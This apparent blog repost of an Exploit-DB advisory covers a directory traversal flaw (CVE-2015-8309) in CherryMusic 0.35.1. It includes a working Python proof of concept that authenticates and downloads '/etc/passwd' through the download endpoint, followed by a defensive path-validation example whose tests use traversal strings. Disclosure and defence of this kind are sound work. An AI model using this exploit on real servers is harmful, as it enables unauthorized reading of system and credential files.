Tuesday, 25 October 2016

Cherry Music 0.35.1 - Arbitrary File Disclosure - Exploit

Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files

Good afternoon, friends! This time the admin will share an article about an exploit. Please have a read.


Exploit author's description:

# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
The exploit is written in Python.

Proof of Concept:

import urllib2, cookielib, urllib

#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
    if c.name == "session_id":
        session_id = c.value

opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
    zipFile.write(response)
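
The PoC above sends an absolute path inside the JSON list of the `value` parameter to the download endpoint. The following is an added example (not part of the original post, and not CherryMusic's code or its actual fix) of the containment check a download handler needs for such a parameter; the function names, the exception class and the media directory layout are assumptions.

```python
import json
import os
import tempfile

class PathRejected(ValueError):
    """Raised when a requested path would leave the media directory."""

def resolve_download_paths(basedir, value_param):
    """Parse the JSON list sent as `value`; return paths proven to be inside basedir."""
    base = os.path.realpath(basedir)
    try:
        requested = json.loads(value_param)
    except ValueError:
        raise PathRejected("value is not valid JSON")
    if not isinstance(requested, list) or not all(isinstance(p, str) for p in requested):
        raise PathRejected("value must be a JSON list of strings")
    resolved = []
    for rel in requested:
        # os.path.join drops `base` when `rel` is absolute, so "/etc/passwd"
        # would be used verbatim: reject absolute paths before joining.
        if os.path.isabs(rel):
            raise PathRejected("absolute path: %r" % rel)
        # realpath collapses ".." and follows symlinks before the containment check.
        candidate = os.path.realpath(os.path.join(base, rel))
        if os.path.commonpath([base, candidate]) != base:
            raise PathRejected("escapes media directory: %r" % rel)
        resolved.append(candidate)
    return resolved

def demo():
    """Run the check on constructed request values in a throwaway media directory."""
    samples = ('["album/track.mp3"]', '["/etc/passwd"]',
               '["../../etc/passwd"]', '["album/../../x"]')
    with tempfile.TemporaryDirectory() as media:
        os.makedirs(os.path.join(media, "album"))
        open(os.path.join(media, "album", "track.mp3"), "wb").close()
        results = {}
        for value in samples:
            try:
                resolve_download_paths(media, value)
                results[value] = "allowed"
            except PathRejected:
                results[value] = "rejected"
        return results

if __name__ == "__main__":
    for value, verdict in demo().items():
        print(verdict, value)
```
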

That is all for the tutorial I can share. Apologies for any mistakes in wording ^_^

Source: Exploit DB - Cherry Music 0.35.1 - LFD Exploit

Vulnerable App: Cherry Music 0.35.1
